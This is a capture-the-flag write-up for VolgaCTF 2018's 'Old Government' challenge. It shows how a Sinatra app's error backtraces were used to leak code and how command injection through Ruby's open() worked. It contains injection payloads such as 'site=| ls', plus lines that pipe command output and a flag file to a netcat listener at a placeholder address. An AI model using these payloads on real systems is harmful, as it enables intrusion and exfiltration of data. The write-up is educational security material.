Tags: netcat command remote execution ruby 

Rating:

---
title: volgactf 2018 - Old Government
author: onionpsy
categories:
- hacking
---

We started by checking the link on the header and we saw that an `id` is passed in the url with the id of the page: `page?id=36`. After some tries we found that we could crash the application by passing id as an array, like that : `page?id[]=36`.

```ruby
NoMethodError at /page
undefined method `to_i' for ["36"]:Array Did you mean? to_s to_a to_h
```

It gave us info that the website is powered by Sinatra, a ruby web framework.

On the backtrace, we could see part of the code.

### articles.erb
```ruby
case @id.to_i

when 2
erb :page2
when 5
erb :page5
when 18
erb :page18
when 23
```

### app.rb
```ruby
headers "Server" => ""
erb :index
end

get '/page' do
@id = params[:id]
headers "Server" => ""

erb :articles

end

post '/page' do
@id = params[:id]
headers "Server" => ""
erb :articles
end
```

After a few tries on the pages, we found that the page with the id 18 has a form with 2 fields. One is waiting a valid url (`site`) and the other is an optional description (`description`). We used once again the `page?id[]=36` trick but through the POST this time. This gave us more informations about the code. The most interesting one is this function:

```ruby
def siteValidator(site)
begin
r = open(site, :allow_redirections => :all)
(...)
```

Judging by the name it seems that this one is ran on the site field of the post query. Judging by [OWASP - Ruby on Rails Cheatsheet](https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet), `open` can be actually used to inject command.
After some tries we can see that it works:
* `site=| ls` show `validated`
* `site=| aaaa` show `error`

But because we don't have any sort of output, we decided to create a reverse shell using netcat (present on the server) using this syntax: `site=| <command> | netcat <ip> <port>`

After some directory listing, we saw the flag file:
`site=| cat ../../flag | netcat <ip> <port>`

Done!

Original writeup (https://github.com/phi0/phi0.github.io/blob/master/_posts/2018-03-24-volgactf-2018%20-%20Old%20Government.md).